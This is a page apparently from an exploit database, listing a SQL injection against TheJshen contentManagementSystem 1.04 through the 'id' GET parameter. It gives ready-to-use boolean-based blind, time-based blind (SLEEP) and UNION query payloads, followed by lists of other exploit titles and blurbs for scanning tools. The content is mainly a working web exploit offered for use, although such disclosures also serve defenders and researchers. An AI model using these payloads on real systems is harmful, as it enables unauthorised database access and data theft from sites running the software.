Menu

Search for hundreds of thousands of exploits

"TheJshen contentManagementSystem 1.04 - 'id' SQL Injection"

Author

Exploit author

cakes

Platform

Exploit platform

php

Release date

Exploit published date

2019-11-01

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
# Exploit Title: TheJshen contentManagementSystem 1.04 - 'id' SQL Injection
# Date: 2019-11-01
# Exploit Author: Cakes
# Vendor Homepage: https://github.com/thejshen/contentManagementSystem
# Version: 1.04
# Software Link: https://github.com/thejshen/contentManagementSystem.git
# Tested on: CentOS7

# GET parameter 'id' easy SQL Injection
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=4' AND 5143=5143-- OWXt
    Vector: AND [INFERENCE]

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=4' AND (SELECT 4841 FROM (SELECT(SLEEP(5)))eqmp)-- ZwTG
    Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])

    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: id=-4903' UNION ALL SELECT NULL,NULL,CONCAT(0x716a706b71,0x66766f636c546750775053685352676c4f70724d714c4b64494e755252765a626370615a565a4b49,0x717a6a7671),NULL,NULL-- hkoh
    Vector:  UNION ALL SELECT NULL,NULL,[QUERY],NULL,NULL[GENERIC_SQL_COMMENT]
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2019-11-05 "rimbalinux AhadPOS 1.11 - 'alamatCustomer' SQL Injection" webapps php cakes
2019-11-05 "html5_snmp 1.11 - 'Remark' Persistent Cross-Site Scripting" webapps php cakes
2019-11-05 "html5_snmp 1.11 - 'Router_ID' SQL Injection" webapps php cakes
2019-11-05 "thejshen Globitek CMS 1.4 - 'id' SQL Injection" webapps php cakes
2019-11-05 "thrsrossi Millhouse-Project 1.414 - 'content' Persistent Cross-Site Scripting" webapps php cakes
2019-11-01 "TheJshen contentManagementSystem 1.04 - 'id' SQL Injection" webapps php cakes
2019-10-28 "delpino73 Blue-Smiley-Organizer 1.32 - 'datetime' SQL Injection" webapps php cakes
2019-10-28 "waldronmatt FullCalendar-BS4-PHP-MySQL-JSON 1.21 - 'description' Cross-Site Scripting" webapps php cakes
2019-10-28 "waldronmatt FullCalendar-BS4-PHP-MySQL-JSON 1.21 - 'start' SQL Injection" webapps php cakes
2019-10-17 "WorkgroupMail 7.5.1 - 'WorkgroupMail' Unquoted Service Path" local windows cakes
2019-10-16 "LiteManager 4.5.0 - 'romservice' Unquoted Serive Path" local windows cakes
2019-10-16 "Zilab Remote Console Server 3.2.9 - 'zrcs' Unquoted Service Path" local windows cakes
2019-10-16 "Mikogo 5.2.2.150317 - 'Mikogo-Service' Unquoted Serive Path" local windows cakes
2019-10-15 "ActiveFax Server 6.92 Build 0316 - 'ActiveFaxServiceNT' Unquoted Service Path" local windows cakes
2019-09-26 "citecodecrashers Pic-A-Point 1.1 - 'Consignment' SQL Injection" webapps php cakes
2019-09-19 "GOautodial 4.0 - 'CreateEvent' Persistent Cross-Site Scripting" webapps php cakes
2019-09-18 "Hospital-Management 1.26 - 'fname' SQL Injection" webapps php cakes
2019-09-16 "CollegeManagementSystem-CMS 1.3 - 'batch' SQL Injection" webapps php cakes
2019-09-14 "College-Management-System 1.2 - Authentication Bypass" webapps php cakes
2019-09-14 "Ticket-Booking 1.4 - Authentication Bypass" webapps php cakes
2019-09-03 "FileThingie 2.5.7 - Arbitrary File Upload" webapps php cakes
2018-10-06 "Chamilo LMS 1.11.8 - 'firstname' Cross-Site Scripting" webapps php cakes
2018-10-05 "Netis ADSL Router DL4322D RTK 2.1.1 - Cross-Site Request Forgery (Add Admin)" webapps hardware cakes
2018-10-05 "Chamilo LMS 1.11.8 - Cross-Site Scripting" webapps php cakes
2018-10-01 "Billion ADSL Router 400G 20151105641 - Cross-Site Scripting" webapps hardware cakes
2018-09-17 "Netis ADSL Router DL4322D RTK 2.1.1 - Cross-Site Scripting" webapps hardware cakes
2018-09-17 "Netis ADSL Router DL4322D RTK 2.1.1 - Denial of Service (PoC)" dos hardware cakes
2018-08-31 "Vox TG790 ADSL Router - Cross-Site Scripting" webapps hardware cakes
2018-08-24 "Vox TG790 ADSL Router - Cross-Site Request Forgery (Add Admin)" webapps hardware cakes
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.